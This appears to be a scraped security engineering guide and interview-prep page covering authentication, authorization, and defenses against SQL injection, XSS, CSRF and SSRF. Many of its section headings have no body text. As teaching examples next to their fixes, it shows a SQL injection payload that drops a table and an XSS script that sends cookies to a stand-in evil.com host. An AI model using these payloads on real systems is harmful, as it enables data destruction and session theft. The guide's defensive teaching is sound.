Documentation Index

Fetch the complete documentation index at: https://resources.devweekends.com/llms.txt

Use this file to discover all available pages before exploring further.

​

Part I — Authentication and Access Control

​

Chapter 1: Authentication

​

1.1 What Authentication Is

​

1.2 Session-Based Authentication

​

The Scaling Problem

​

Trade-offs

​

1.3 Token-Based Authentication

​

How It Works

​

Why It Dominates Modern Architectures

​

The Revocation Problem

​

1.4 JSON Web Tokens (JWT)

• Storing sensitive data in the payload — JWTs are encoded, not encrypted. Anyone can decode the payload with base64.
• Storing JWTs in localStorage — this is an XSS attack vector; any JavaScript on the page can read localStorage and steal the token. Store access tokens in memory (JavaScript variable) and refresh tokens in HttpOnly Secure cookies.
• Using long-lived JWTs (24h+) without refresh rotation — a stolen token is valid for the full duration. Use short-lived access tokens (5-15 minutes) with refresh tokens.
• Not validating all claims — always verify signature, expiration, issuer, audience.
• Using the “none” algorithm — some libraries allow unsigned tokens. Always enforce specific algorithms server-side.

​

1.5 OAuth 2.0

​

The Grant Types That Matter

​

1.6 OpenID Connect (OIDC)

​

1.7 Single Sign-On (SSO)

​

SP-Initiated vs. IdP-Initiated Flows

​

1.8 Multi-Factor Authentication (MFA)

​

1.8a Passkeys and WebAuthn — The Future of Authentication

​

What Passkeys Are

​

How WebAuthn Works Under the Hood

​

Why Passkeys Are Phishing-Proof

​

Synced Passkeys vs. Device-Bound Passkeys

​

The Current State of Passkey Adoption (2025)

• Browser support: Chrome, Safari, Firefox, and Edge all support WebAuthn. Passkey creation and authentication works across all major platforms.
• Platform support: Apple (iCloud Keychain passkeys since iOS 16/macOS Ventura), Google (Google Password Manager passkeys since Android 14), Microsoft (Windows Hello passkeys in Windows 11).
• Cross-device authentication: You can use a passkey on your phone to log into a website on your laptop via Bluetooth proximity (the FIDO Cross-Device Authentication protocol, also called “hybrid transport”). This is how “scan this QR code with your phone” passkey flows work.
• Major adopters: Google, GitHub, Amazon, PayPal, Shopify, Best Buy, Kayak, Dashlane, 1Password, and many others now support passkeys. Google reported that passkey sign-ins are 40% faster than passwords and have a 4x higher success rate.
• Gaps: Enterprise adoption is still catching up. Some password managers do not yet fully support passkey import/export. Cross-platform passkey portability (moving passkeys from Apple’s ecosystem to Google’s) is improving but not seamless.

​

1.9 Service-to-Service Authentication

​

1.9a Machine Identity and Non-Human Access

• Service accounts — long-lived credentials assigned to applications. In Kubernetes, these are Kubernetes ServiceAccounts projected as JWT tokens. In cloud providers, these are IAM roles (AWS), service accounts (GCP), or managed identities (Azure).
• CI/CD pipeline identities — GitHub Actions runners, Jenkins agents, ArgoCD controllers. These need credentials to deploy, access registries, and interact with cloud APIs. The gold standard is OIDC federation: the CI platform issues a short-lived OIDC token, and the cloud provider exchanges it for temporary credentials with no static secrets.
• Cron jobs and batch processors — often run with the same credentials as the main application but need different (usually narrower) permissions. A nightly report generator should not have write access to the payments database.
• IoT and edge devices — cannot use traditional auth flows (no browser, no human). Use X.509 certificates with device-specific keys, or device attestation with a provisioning service.

​

1.10 Auth Architecture Decision Tree

• Server-rendered web app, less than 10K users? Sessions + Redis + simple RBAC table. Around 200 lines of auth code.
• SPA + API + mobile clients? JWT access tokens (15-min expiry) + refresh tokens (HttpOnly cookie) + OAuth 2.0 PKCE for the SPA.
• B2B SaaS where customers demand SSO? Use a managed identity provider (Auth0, Clerk, WorkOS) from day one. Implementing SAML + OIDC from scratch is 2-3 months of work.
• Microservices? JWT for user-to-service (API gateway validates once, forwards claims). mTLS for service-to-service. Client Credentials grant for machine-to-machine.
• Not sure yet? Start with a managed provider. Migration cost is lower than building auth wrong.

​

1.12 Zero-Trust Architecture

• mTLS between all services — no plaintext internal communication.
• Identity-based access — service accounts, not IP-based allowlists (IPs change in cloud environments).
• Micro-segmentation — network policies that restrict which services can talk to which.
• Identity-aware proxies — Google’s BeyondCorp model: authenticate users at the edge, no VPN needed.
• Continuous verification — do not trust a session forever; re-evaluate risk based on behavior.

​

1.13 API Authentication Patterns

​

Part I Quick Reference: Authentication Decision Matrix

​

Further Reading & Deep Dives — Part I: Authentication

• Auth0 Blog: OAuth 2.0 and OpenID Connect — Auth0’s engineering team walks through every OAuth and OIDC flow with interactive diagrams. One of the best free resources for understanding delegated authorization in practice.
• Google BeyondCorp: A New Approach to Enterprise Security — The foundational paper on zero-trust architecture. Google eliminated their corporate VPN and moved to identity-aware proxies. This paper changed how the industry thinks about network perimeters.
• Cloudflare Blog: What is Mutual TLS (mTLS)? — A clear, visual explanation of mTLS with practical guidance on when and how to deploy it. Especially useful for teams adopting service meshes.
• Troy Hunt: Passwords Evolved — Authentication Guidance for the Modern Era — Troy Hunt (creator of Have I Been Pwned) dismantles common password myths and provides evidence-based guidance on password policies, MFA, and credential stuffing defense.
• GitHub Blog: Security incident — stolen OAuth tokens — GitHub’s transparent post-incident analysis of their 2022 OAuth token breach. A masterclass in incident disclosure and a concrete example of how OAuth token theft plays out at scale.
• OAuth 2.0 Simplified by Aaron Parecki — The definitive practical guide to OAuth 2.0 flows, written by an OAuth working group member. Start here if you want to understand OAuth without drowning in RFC language.

​

Chapter 2: Authorization

​

2.1 Role-Based Access Control (RBAC)

Table: permissions
  id | name                  | description
  1  | orders:read           | View orders
  2  | orders:write          | Create and update orders
  3  | orders:delete         | Delete orders
  4  | reports:export        | Export reports

Table: roles
  id | name     | permissions
  1  | viewer   | [orders:read]
  2  | editor   | [orders:read, orders:write]
  3  | admin    | [orders:read, orders:write, orders:delete, reports:export]

Table: user_roles
  user_id | role_id | tenant_id
  usr_1   | 3       | tenant_A    (admin in tenant A)
  usr_1   | 1       | tenant_B    (viewer in tenant B)

function authorize(user, permission, resource):
  roles = getUserRoles(user.id, resource.tenant_id)  // from cache/DB
  for role in roles:
    if permission in role.permissions:
      return ALLOW
  return DENY  // deny by default

​

2.2 Attribute-Based Access Control (ABAC)

​

2.3 Row-Level Security

​

2.4 Least Privilege and Separation of Duties

​

2.5 Delegated Administration and Authorization Drift

• Tenant-scoped admin. The tenant admin can manage users and roles within their tenant but cannot see or affect other tenants. This is the minimum viable B2B authorization model. The implementation trap: ensuring the admin API endpoints enforce tenant scoping, not just the UI. A tenant admin who discovers the PUT /api/users/{id}/role endpoint should get a 404 (not 403) for user IDs outside their tenant.
• Hierarchical delegation. A parent organization delegates admin rights to child organizations (common in franchise, healthcare, and education). The parent’s admin can see all children. A child’s admin can only see their own org. The complexity: permission inheritance, override policies, and the “who wins?” problem when a parent policy conflicts with a child policy.
• Scoped delegation. An admin can grant permissions they hold, but not permissions beyond their own scope. This prevents privilege escalation via the admin interface. The check: before allowing Admin A to grant billing:manage to User B, verify that Admin A themselves holds billing:manage. Without this check, a user with users:manage can escalate to full admin by granting themselves any permission.

• Access logging analysis. Compare granted permissions against actually-used permissions over 90 days. If a user has 15 permissions but only exercises 4, the other 11 are drift. AWS IAM Access Analyzer does this for cloud permissions.
• Periodic access reviews. Quarterly, each team lead reviews their team’s permissions and confirms or removes them. Automate the review trigger and default to “revoke if not confirmed within 14 days.”
• Anomaly detection. Alert when a user exercises a permission they have not used in 90+ days. This could be legitimate (rare task) or could be a compromised account exploring its access.

​

Chapter 3: Identity and Session Concerns

​

3.1 Session Expiration and Refresh Tokens

​

3.2 Token Revocation

​

3.3 Impersonation and Support Access

JWT claims during impersonation:
  sub: "usr_target_456"          // target user's ID
  actor: "support_agent_789"     // agent's identity
  act_type: "impersonation"      // distinguishes from normal auth
  scope: "read-only"             // impersonation scope
  tenant_id: "tenant_abc"        // target tenant
  reason: "TICKET-1234"          // linked to support ticket
  exp: 1800                      // 30-minute max TTL
  iss: "support-impersonation"   // separate issuer for audit filtering

​

3.4 Token and Session Coexistence Patterns

• Web = sessions, API = tokens. The server-rendered web app uses session cookies (instant revocation, simple). The mobile app and public API use JWT Bearer tokens (stateless, cross-platform). The auth middleware checks for both and resolves the user identity from whichever is present.
• External = tokens, internal = mTLS + forwarded claims. The API gateway validates user JWTs and forwards user context as trusted headers. Service-to-service calls use mTLS for identity and propagate user context in headers or message metadata.
• Legacy = sessions, new services = tokens. During a migration, old endpoints accept session cookies while new endpoints accept JWTs. A translation layer at the gateway converts between them.

1. Inconsistent revocation semantics. If you revoke a user’s session, their JWT is still valid for up to 15 minutes. If you revoke their refresh token, their active session might still be alive. During coexistence, you need a unified revocation mechanism that invalidates both.
2. Permission snapshot divergence. Sessions can reflect real-time permissions (re-fetched on each request from the session store). JWTs carry a snapshot from token issuance. If a user’s role changes, the session reflects it immediately while the JWT is stale until refresh. During coexistence, this inconsistency creates bugs where the same user has different permissions depending on which auth mechanism their request uses.
3. CSRF surface area. Session-based endpoints are CSRF-vulnerable (cookies are auto-attached). Token-based endpoints are not (Authorization header is explicitly set). During coexistence, the CSRF protection must be applied selectively to session-based endpoints without breaking token-based endpoints that do not send CSRF tokens.

​

Part II — Security

​

Chapter 4: Application Security

​

4.1 Input Validation

​

Allowlist Over Denylist

​

Validate at the Boundary

​

What to Validate

​

4.2 SQL Injection

-- DANGEROUS: user input directly in the query string
query = "SELECT * FROM users WHERE email = '" + userInput + "'"
-- If userInput = "'; DROP TABLE users; --"
-- The query becomes: SELECT * FROM users WHERE email = ''; DROP TABLE users; --'

-- SAFE: database driver handles escaping, user input never becomes SQL
query = "SELECT * FROM users WHERE email = $1"
db.query(query, [userInput])
-- userInput is treated as a literal string, not SQL code

​

4.3 Cross-Site Scripting (XSS)

<!-- DANGEROUS: rendering user input without escaping -->
<div>Welcome, ${userName}</div>
<!-- If userName = "<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>" -->
<!-- The script executes and steals the user's session cookie -->

<!-- SAFE: framework auto-escapes (React, Angular, Vue all do this by default) -->
<div>Welcome, {userName}</div>
<!-- React escapes < > & " to their HTML entities — the script is displayed as text, not executed -->

<!-- Content Security Policy header — defense in depth -->
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
<!-- Even if XSS gets through, CSP blocks execution of inline scripts and external sources -->

​

4.4 CSRF

​

Prevention Layers (Defense in Depth)

1. Anti-CSRF tokens — generate a random token per session, embed it in every form as a hidden field, validate it server-side on every state-changing request. The attacker cannot read the token from their malicious page (same-origin policy). Frameworks like Django, Rails, and Laravel include CSRF protection by default.
2. SameSite cookies — set SameSite=Strict or SameSite=Lax on session cookies so the browser does not send them on cross-origin requests. Lax is the default in modern browsers (Chrome, Firefox, Edge since 2020) and blocks most CSRF while allowing top-level navigation (clicking a link).
3. Custom request headers — for APIs, require a custom header like X-Requested-With: XMLHttpRequest. Simple cross-origin form submissions cannot set custom headers.
4. Origin/Referer validation — check that the Origin or Referer header matches your domain.

​

4.5 SSRF

1. Allowlist permitted domains and protocols (only https://, only known domains).
2. Block internal IP ranges (10.x.x.x, 172.16.x.x, 192.168.x.x, 169.254.x.x, 127.0.0.1).
3. Resolve DNS before making the request and verify the resolved IP is not internal (prevents DNS rebinding attacks where a domain resolves to an internal IP).
4. Run URL-fetching in an isolated service/container with no access to internal networks.
5. Disable HTTP redirects or re-validate after each redirect (attacker can redirect from an external URL to an internal one).

​

4.6 Secure Defaults

• Access denied by default (new endpoints require auth unless explicitly marked public).
• New database users have no permissions (grant only what is needed).
• Cookies are HttpOnly, Secure, and SameSite=Lax by default.
• Logging frameworks exclude fields named password, token, secret, credit_card by default.
• CORS is restrictive by default (no Access-Control-Allow-Origin: *).
• Docker containers run as non-root by default.
• Environment variables for secrets are required (app fails to start if DATABASE_URL is not set, rather than falling back to a hardcoded default).

​

4.7 Dependency Management and Supply Chain Security

​

Prevention Practices

• Pin dependency versions (use lock files — package-lock.json, Pipfile.lock, go.sum).
• Use automated dependency updates (Dependabot, Renovate) with CI checks — update regularly but review changes. Never auto-merge dependency updates without review.
• Scan for known vulnerabilities (npm audit, Snyk, GitHub security advisories).
• Use private registries for internal packages (Artifactory, GitHub Packages, AWS CodeArtifact).
• Limit the number of dependencies — every dependency is an attack surface. Before adding a 5-line utility package, consider writing it yourself.
• Review new dependencies before adding (check maintenance activity, download counts, known vulnerabilities, and the maintainer’s identity).
• Generate a Software Bill of Materials (SBOM) for compliance and incident response — when the next Log4Shell happens, you need to know within minutes whether you’re affected.

​

4.8 Modern Threat Vectors

​

Prompt Injection (AI/LLM Systems)

• Treat LLM output as untrusted (never execute it directly as code or SQL).
• Use input/output filtering to detect injection patterns.
• Separate data and instructions by design (structured prompts with clear boundaries).
• Apply least privilege to LLM tool access — if the model can call APIs, restrict which ones and with what permissions.
• Log and monitor LLM interactions for anomalous behavior.

​

Dependency Confusion

• Use scoped packages (@yourcompany/package-name) on public registries.
• Configure package managers to always prefer your private registry for internal package names.
• Use tools like Socket.dev or Artifactory to detect namespace conflicts.
• Pin exact versions and verify checksums in lock files.

​

Container Escape

• Run containers as non-root users.
• Use read-only root filesystems.
• Drop all Linux capabilities and add back only what is needed.
• Use seccomp and AppArmor profiles to restrict system calls.
• Keep the container runtime (Docker, containerd) and host kernel patched.
• Use gVisor or Kata Containers for stronger isolation in multi-tenant environments.

​

Subdomain Takeover

• Audit DNS records regularly and remove stale entries.
• Monitor for dangling CNAMEs pointing to deprovisioned services (GitHub Pages, Heroku, S3 buckets).
• Use tools like subjack or can-i-take-over-xyz for automated detection.

​

Chapter 5: Data Security

​

5.1 Encryption at Rest

• Full-disk encryption — entire volume (AWS EBS encryption, Azure Disk Encryption). Transparent, no code changes, protects against physical theft but not against anyone with OS-level access.
• Database-level TDE — Transparent Data Encryption. Encrypts the database files, transparent to the application (SQL Server, Oracle, PostgreSQL with extensions).
• Column-level encryption — encrypt specific sensitive columns (credit card numbers, SSNs). The database stores ciphertext, application decrypts on read.
• Application-level encryption — encrypt before sending to the database. Strongest: the database never sees plaintext, but prevents querying/indexing encrypted fields.

​

Envelope Encryption (How KMS Works)

​

5.2 Encryption in Transit

• TLS 1.2+ everywhere — TLS 1.0 and 1.1 are deprecated; disable them.
• HSTS headers (Strict-Transport-Security: max-age=31536000; includeSubDomains) — tells browsers to always use HTTPS, preventing downgrade attacks.
• mTLS for internal service-to-service — both parties present certificates (see Zero-Trust in Part I).
• Certificate management: automate with Let’s Encrypt (public), cert-manager in Kubernetes (internal), or cloud certificate managers (ACM, Azure Key Vault).

​

5.3 Secrets Management

​

5.4 Data Masking and Tokenization

​

5.5 Threat Modeling

​

Part II Quick Reference: Security Threat Decision Matrix

​

Further Reading & Deep Dives — Part II: Security

• OWASP Top 10 (2021) — The industry-standard ranking of the most critical web application security risks. Updated periodically, this is the baseline every engineer should know. The 2021 edition elevated Broken Access Control to the number one spot and added new categories for insecure design and supply chain integrity.
• Netflix Tech Blog: Detecting Credential Compromise in AWS — Netflix’s security team explains their approach to detecting and responding to compromised credentials in cloud environments. A real-world look at how a sophisticated engineering organization thinks about defense-in-depth.
• PortSwigger Web Security Academy — Free, hands-on labs covering every major web vulnerability (SQLi, XSS, SSRF, CSRF, and more). The best way to learn application security is to practice attacking and defending — this is where you do it.
• Cloudflare Blog: A Detailed Look at RFC 8705 — OAuth 2.0 Mutual-TLS — Cloudflare’s deep dive into mutual TLS for API authentication, including practical deployment considerations and performance characteristics.
• The Log4Shell vulnerability explained (Snyk) — A technical breakdown of CVE-2021-44228 with exploit walkthroughs, impact analysis, and lessons for dependency management. Essential reading for understanding why SBOMs and transitive dependency visibility matter.
• Microsoft Incident Response: Storm-0558 Key Acquisition — Microsoft’s own post-incident investigation into how a consumer signing key was used to forge enterprise Azure AD tokens. A sobering case study in key management and token validation failures at the highest level.

​

Common Interview Mistakes

​

Quick Wins for Interview Day

1. “I’d implement defense in depth — no single security control should be the only thing standing between an attacker and our data.” This signals you understand that security is a layered system, not a checkbox. Follow up with a concrete example: “For example, even if our JWT validation is perfect, I’d still want row-level security at the database layer, because application bugs happen, and the database is the last line of defense.”
2. “The first thing I’d check is whether we’re using asymmetric signing (RS256) for JWTs rather than symmetric (HS256), especially in a microservice architecture.” This shows you understand that in distributed systems, only the auth service should hold the signing key, and every other service should verify with the public key. HS256 means every verifying service has the secret — one compromised service compromises the entire auth system.
3. “I’d want to understand the revocation latency requirements before choosing between sessions and tokens.” This reframes the sessions-vs-tokens debate in terms of business requirements, not technology preferences. “For a banking app where we need sub-second revocation on account compromise, I’d lean toward sessions with Redis. For a consumer content app where a 15-minute revocation window is acceptable, stateless JWTs with refresh token rotation give us better scalability.”
4. “I treat authorization as a data problem, not a code problem.” This signals you think about authorization at the right level of abstraction. “Permissions should be stored as data (role-permission mappings in a database), evaluated by a policy engine (OPA, Cedar), and enforced in middleware — not scattered across application code as if-statements. Data-driven authorization is auditable, testable, and changeable without redeployment.”
5. “For secrets management, I follow the principle that secrets should be injected, not embedded — and rotated automatically, not manually.” This shows operational maturity. “I’d use Vault or AWS Secrets Manager to inject secrets at runtime, with automatic rotation policies. The application should never know the actual secret value at deploy time — it receives it from the secrets manager at startup or on-demand.”
6. “When I hear ‘multi-tenant,’ my first question is about isolation boundaries — where exactly does Tenant A’s blast radius end?” This shows you understand that multi-tenant security is about containment, not just access control. “I’d want database-level RLS as a safety net under application-level filtering, tenant-scoped encryption keys so a key compromise affects only one tenant, and separate audit logs per tenant for compliance.”
7. “I’d use threat modeling (STRIDE) during the design phase, not as a post-hoc security review.” This signals you integrate security into the development process. “Threat modeling is cheapest at design time — finding an SSRF vulnerability in a design document costs 30 minutes; finding it in production costs an incident, a patch, a post-mortem, and potentially a breach notification.”

​

Security Mindset Checklist

​

Interview Deep-Dive Questions

​

Q1. You’re designing the auth system for a new SaaS product from scratch. Walk me through your decision-making process.

​

Follow-up: Your managed auth provider has a 30-minute outage. No users can log in. What is your plan?

​

Follow-up: Six months in, your first enterprise customer demands SAML SSO, a dedicated tenant, and audit logs for every authentication event. How do you approach the onboarding?

​

Going Deeper: How do you handle the “SSO tax” debate — the criticism that SaaS companies charge extra for security features like SSO?

​

Q2. Explain the difference between authentication and authorization, and give me an example of a system where confusing the two caused a real vulnerability.

​

Follow-up: How would you ensure that authorization checks are never accidentally skipped when a new API endpoint is added?

router.post('/orders', { permission: 'orders:write' }, handleCreateOrder)
router.get('/orders/:id', { permission: 'orders:read' }, handleGetOrder)

​

Follow-up: What about internal admin endpoints that “only our team uses” — do those need the same level of authorization?

​

Q3. A colleague proposes storing JWTs in localStorage for your SPA. Make the case for why this is dangerous and propose an alternative architecture.

​

Follow-up: If XSS can’t steal the token in this architecture, does that mean XSS is no longer a threat?

​

Q4. Your microservice architecture has 40 services. How do you handle authentication and authorization across service-to-service calls?

​

Follow-up: How do you handle the “confused deputy” problem — where Service A is authorized to call Service B, but it passes along a user request that the user should not have access to?

​

Going Deeper: How does a service mesh like Istio actually implement mTLS under the hood, and what happens during certificate rotation?

​

Q5. What is the difference between OAuth 2.0 and OpenID Connect, and when would you use each?

​

Follow-up: What is the purpose of the nonce parameter in OIDC, and what attack does it prevent?

​

Follow-up: Walk me through exactly what happens during a PKCE flow and why it was needed.

​

Q6. How do you securely handle password storage, and what would you do if you discovered your production system is using SHA-256 for password hashing?

​

Follow-up: What is a “pepper” and why is it not a substitute for a salt?

​

Q7. Explain how a CSRF attack works. Then explain why it is irrelevant for some modern architectures but critical for others.

​

Follow-up: What is the difference between SameSite=Strict and SameSite=Lax, and when does each cause problems?

​

Q8. How does Zero Trust differ from traditional perimeter security, and what does it actually look like in a production Kubernetes deployment?

​

Follow-up: A team member argues that implementing zero trust is overkill for your 10-person startup with 5 services. How do you respond?

​

Q9. You discover that your application has a Server-Side Request Forgery (SSRF) vulnerability. Walk me through the investigation and fix.

​

Follow-up: How does IMDSv2 specifically protect against SSRF, and why isn’t it a complete solution?

​

Q10. Explain token refresh rotation and how it detects token theft. What happens if the detection has a race condition?

​

Follow-up: How do you store refresh tokens server-side, and what does the data model look like?

Table: refresh_tokens
  id              UUID (primary key)
  token_hash      VARCHAR(64)    -- SHA-256 hash of the token
  user_id         UUID           -- FK to users
  family_id       UUID           -- groups tokens from the same login session
  device_info     JSONB          -- user agent, IP, device fingerprint
  issued_at       TIMESTAMP
  expires_at      TIMESTAMP      -- 7-30 days
  rotated_at      TIMESTAMP      -- null if current, set when rotated
  revoked_at      TIMESTAMP      -- null if active
  replaced_by     UUID           -- FK to the token that replaced this one

​

Q11. What is the OWASP Top 10, and if you could only fix three vulnerabilities on the list for a new application, which three would you prioritize and why?

​

Follow-up: What is the difference between A04 Insecure Design and the other categories? Is not every vulnerability a design flaw?

​

Q12. A staff engineer on your team proposes moving from session-based auth to JWTs for “better scalability.” Push back on this. What questions would you ask, and when would you say no?

​

Follow-up: If you do migrate, how do you handle the transition period where some users have sessions and others have JWTs?

​

Going Deeper: What monitoring and alerting would you set up specifically for the auth system, independent of general application monitoring?

​

Advanced Interview Scenarios

​

S1. Your on-call engineer gets paged at 3 AM: “Users are randomly getting logged out.” Walk me through your investigation.

​

Follow-ups

​

S2. A product manager asks you to add “Login with Google” to your app. It sounds simple. What can go wrong?

​

Follow-ups

​

S3. Your CEO reads a headline about a breach at a competitor and asks: “Could this happen to us?” The breach involved stolen API keys from a public GitHub repo. How do you respond?

​

Follow-ups

​

S4. You are designing the auth system for a public developer API platform (think Stripe, Twilio, or GitHub). What are the key design decisions?

​

Follow-ups

​

S5. Your team just deployed a new authorization policy engine (OPA/Cedar). A week later, a customer reports they can no longer access a feature they used yesterday. Nothing in their account changed. How do you debug this?

​

Follow-ups

​

S6. The “obvious” answer is wrong: Your security team mandates 90-day password rotation for all users. Argue against this policy with evidence.

​

Follow-ups

​

S7. You inherit a monolith that stores user sessions in a database table with no encryption. The app has 500K monthly active users. Design a migration to modern session management without downtime.

​

Follow-ups

​

S8. A penetration tester reports a critical finding: your application’s password reset flow is vulnerable to account takeover. The reset token is a timestamp-based hash. Redesign the flow.

​

Follow-ups

​

S9. Your application encrypts sensitive data at rest using AES-256. A compliance auditor asks: “Who can decrypt this data, and how do you know?” Walk through your answer.

​

Follow-ups

​

B2B and Enterprise Auth Realities

​

Tenant-Level Identity Architecture

• One human, multiple tenants. A consultant works with three enterprise customers. They need one login that grants them different roles in different tenants. Your user model needs a user_roles table scoped by tenant_id, not a single role column on the user.
• One tenant, multiple IdPs. After an acquisition, Acme Corp has employees on Azure AD and contractors on Okta. Your SAML/OIDC integration needs to support multiple IdP connections per tenant with email-domain-based routing.
• Shadow accounts. A user signs up with personal email before their company buys an enterprise plan. Now the company wants all @acme.com users under their SSO. You need a domain-claiming flow that migrates existing personal accounts to the enterprise tenant without data loss — and with the user’s consent.

​

Admin and Support Access in Multi-Tenant Systems

1. Platform admin. Your internal engineers who can access all tenants for debugging and operations. These accounts must have the strictest controls: MFA required, short session TTL (15 minutes), IP allowlisting, full audit logging, and break-glass procedures for elevated access.
2. Tenant admin. The customer’s IT administrator who manages users, roles, and policies within their tenant. They must never see data from other tenants — not even tenant IDs. API responses for cross-tenant resources should return 404, not 403 (403 leaks the existence of the resource).
3. Delegated support agent. Your support staff who access a specific tenant’s data to resolve a ticket. This is the impersonation flow covered in Section 3.3, with the enterprise-specific constraints covered in the impersonation interview question.

​

Delegated Authentication Patterns

• Session duration. Tenant A (HIPAA-regulated hospital) requires 15-minute idle timeout. Tenant B (marketing agency) is fine with 8 hours. Your session management must support per-tenant session policies, not a global default.
• MFA enforcement. Tenant A requires hardware keys for all users. Tenant B allows TOTP. Tenant C has not enabled MFA at all. Your auth system must support tenant-level MFA policy configuration and enforce it at login time.
• Conditional access. Azure AD conditional access policies can block logins from unmanaged devices, require compliant browsers, or geo-restrict access. If a customer’s Azure AD policy denies the login, your SAML/OIDC integration receives an error, and you must surface a meaningful message — not a generic “login failed.”
• Step-up authentication. Certain actions (accessing billing, exporting data, changing security settings) require re-authentication or MFA challenge, even within an active session. Enterprise customers want to define which actions trigger step-up, per-tenant.

Table: tenant_auth_policies
  tenant_id         UUID
  idle_timeout_sec  INT      -- 900 for HIPAA, 28800 for relaxed
  absolute_timeout  INT      -- 3600 for strict, 86400 for relaxed
  mfa_required      BOOLEAN
  mfa_methods       TEXT[]   -- [`totp`, `webauthn`, `sms`]
  step_up_actions   TEXT[]   -- [`billing:manage`, `data:export`]
  sso_required      BOOLEAN  -- force SSO, disable password login
  ip_allowlist      CIDR[]   -- optional network restrictions

​

Machine Identity in Enterprise Environments

• Tenant API keys. Enterprise customers create API keys scoped to their tenant. These keys must be tenant-isolated (cannot access other tenants’ data), independently rotatable, and auditable. The admin who created the key and the permissions it holds must be visible in the audit log.
• SCIM provisioning tokens. Directory sync (SCIM) requires a long-lived token for the customer’s IdP to push user changes. This token has write access to the tenant’s user directory — it can create, update, deactivate, and delete users. Compromise of this token is a tenant-level incident. Store it hashed, support rotation, and alert the tenant admin on abnormal SCIM activity (e.g., bulk user deletion).
• Webhook signing secrets. Per-tenant webhook secrets for HMAC verification. If a tenant’s webhook secret is compromised, an attacker can forge webhook payloads that trigger actions in the tenant’s integrated systems. Support per-tenant secret rotation without downtime (dual-secret overlap window).

​

Auth Migration Patterns

​

Session-to-Token Migration

​

IdP Migration (Switching Auth Providers)

​

Secret Rotation at Scale

​

Abuse, Fraud, and Auth System Weaponization

• Account enumeration via registration/reset. If your registration endpoint returns “email already registered” and your reset endpoint returns “no account found,” an attacker can determine which emails are registered. Fix: both endpoints return the same generic response regardless of account existence.
• Credential stuffing. Attackers use breach databases (billions of email/password pairs from previous breaches) to try logging into your app. At scale, this is thousands of login attempts per minute from distributed IPs. Fix: rate limiting per IP and per account, progressive delays, CAPTCHA after failed attempts, and blocking known-compromised passwords at registration (Have I Been Pwned API integration).
• Account lockout as denial of service. If your system locks accounts after N failed attempts, an attacker can intentionally lock out any user by failing N login attempts with their email. This is a denial-of-service via your own security mechanism. Fix: instead of hard lockout, use progressive delays (1s, 2s, 4s, 8s…) and CAPTCHA escalation. Never fully lock an account based solely on failed password attempts — require a CAPTCHA instead.
• MFA fatigue attacks. An attacker who has the user’s password sends repeated push notification MFA challenges until the user approves one out of frustration (this is how the 2022 Uber breach worked). Fix: number-matching MFA (the user must type a number displayed on the login screen into their authenticator app), rate limit push notifications (max 3 per 10 minutes), and alert the user when multiple MFA challenges are triggered.
• Token farming. In systems with generous token lifetimes, attackers automate login-and-collect to accumulate valid tokens for later use or sale. Fix: short token lifetimes, device fingerprinting, anomaly detection on token issuance rate per account.
• Fake SSO phishing. An attacker sets up a fake SSO page mimicking your app’s “Login with Google” button but actually captures the user’s Google credentials via a lookalike Google login page. Fix: passkeys (origin-bound, phishing-resistant), user education, and FIDO2 MFA.

​

Rollout and Migration Deep-Dive Questions

​

R1. Your company is rolling out passkeys to replace password + TOTP. A pilot group of 500 users has been using passkeys for 3 months. You need to decide whether to expand to all 50,000 users. What data do you need?

​

R2. Your auth provider (Okta/Auth0) has a 2-hour outage. New logins are blocked, token refresh is down, and your 15-minute access tokens are expiring. What happens in your system at T+0, T+15, T+30, T+60, and T+120?

​

R3. You need to rotate the signing key for your JWT infrastructure. 40 services validate JWTs. Walk me through the rotation without any authentication failures.

​

R4. Your B2B SaaS platform has 50 enterprise tenants, each with their own SSO configuration. How do you handle onboarding a new tenant’s SSO without breaking existing tenants?

Table: tenant_sso_connections
  tenant_id           UUID
  protocol            ENUM(`saml`, `oidc`)
  idp_entity_id       TEXT     -- SAML entity ID or OIDC issuer URL
  sso_url             TEXT     -- IdP login URL
  certificate         TEXT     -- IdP signing certificate (SAML)
  client_id           TEXT     -- OIDC client ID
  client_secret_ref   TEXT     -- reference to secrets manager
  attribute_mapping   JSONB    -- maps IdP attributes to your user model
  email_domains       TEXT[]   -- which email domains route to this SSO
  status              ENUM(`testing`, `active`, `disabled`)
  created_at          TIMESTAMP

​

R5. Your authorization system has been running RBAC with 5 default roles for 2 years. Enterprise customers are demanding custom roles and fine-grained permissions. Design the migration from fixed RBAC to dynamic, tenant-configurable RBAC without breaking existing tenants.

users.role = ENUM(`viewer`, `editor`, `admin`, `billing_admin`, `owner`)

Table: permissions  (system-wide, immutable by tenants)
  id, name (`orders:read`, `orders:write`, `billing:manage`, ...)

Table: roles  (per-tenant, configurable)
  id, tenant_id, name, is_system_default, permissions[]

Table: user_roles  (per-tenant assignment)
  user_id, role_id, tenant_id

​

Enterprise Auth Failure Scenarios